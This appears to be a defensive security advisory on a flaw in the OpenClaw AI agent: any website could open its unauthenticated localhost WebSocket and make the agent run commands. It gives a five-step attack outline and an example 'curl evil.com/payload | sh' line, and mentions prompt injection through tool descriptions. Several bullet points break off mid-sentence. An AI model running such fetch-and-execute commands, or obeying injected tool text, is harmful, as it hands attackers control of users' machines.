TL;DR
OpenClaw, the open-source AI agent that shipped with the lobster mascot, hit 135,000 machines in five months. Then a security audit found 512 vulnerabilities, eight of them critical. One of them — CVE-2026-25253 — let any website you visited silently take control of your local agent. By the time the patches landed, the project's creator had left for OpenAI and pushed the codebase into an open-source foundation.
If you ran OpenClaw on a public IP at any point in early 2026, assume you were scanned.
What CVE-2026-25253 actually does
OpenClaw exposes a local WebSocket server so its browser dashboard can talk to
the agent. In versions before 2026.2.10, that server didn't validate the
Origin header on incoming WebSocket connections. That matters because the
browser's same-origin policy does not stop a page from opening a WebSocket to
any host, localhost included: the browser attaches an Origin header to the
handshake and leaves it to the server to reject origins it doesn't expect. A
server that never looks at that header will accept a handshake from any page
the user happens to have open.
The attack:
1. You install OpenClaw. It listens on localhost:8765.
2. You browse to a malicious site (or a compromised ad network).
3. JavaScript on that site opens ws://localhost:8765/.
4. The agent accepts the connection, no auth.
5. The site sends commands. The agent runs them with your user permissions.
In practice that means anything from ls ~/.ssh to curl evil.com/payload | sh.
And because the agent has tool execution enabled by default, the attacker
doesn't need a separate exploit chain.
Why it landed so hard
A few things lined up:
- No auth by default. The dashboard was designed to be friction-free.
- Tool execution on by default. Sandbox mode was a config flag, not a default.
- Self-hosters skipped reverse proxies. Many ran the dashboard directly on
- Update cadence was brutal. OpenClaw shipped 13 patch versions in March 2026
A scan that ran in late January found about 1,000 publicly accessible OpenClaw installs with no authentication. The actual number behind home routers is unknowable but almost certainly larger.
Other vulnerabilities worth knowing
The audit flagged 512 issues. Most are low severity. The ones to actually care about:
- Prompt injection in tool descriptions — a malicious tool description in a
- Path traversal in the file tool — relative paths weren't normalized,
- Stored credentials in plaintext — API keys for AI providers were stored in
- Race condition in approval flow — fast clicks could approve a tool call
What to do right now
If you're running OpenClaw:
1. Update. The 2026.4 line has Origin validation, sandbox-by-default, and encrypted credential storage. Yes, you'll have to redo some config.
2. Stop exposing port 8765. If you need remote access, put it behind Tailscale or an SSH tunnel. Don't rely on auth alone.
3. Rotate every API key you stored in OpenClaw before March 2026. Treat them as compromised.
4. Review your shell history. If you ran an agent that browsed the web, look for any commands you don't recognize. They might not be yours.
If you don't have to run OpenClaw specifically, this is a reasonable moment to look at sandboxed alternatives — Hermes Agent runs in Docker by default, NanoClaw uses Apple containers on macOS, and ZeroClaw runs entirely offline. We compare them in the [next guide](/guides/openclaw-alternatives-2026).
Why this matters for the wider self-hosted AI space
OpenClaw's story is the story of every "weekend project that became infrastructure": the threat model lagged the install base by an order of magnitude. The fix isn't to abandon self-hosted agents — it's to treat them like any other long-running process with shell access. Default-deny network exposure. Sandbox tool execution. Rotate credentials. Update or stop running.
The crisis is real, but the post-crisis stack is more honest than what came before. The next year of self-hosted AI is going to be slower, more boring, and significantly less likely to wreck someone's laptop.
That's a good thing.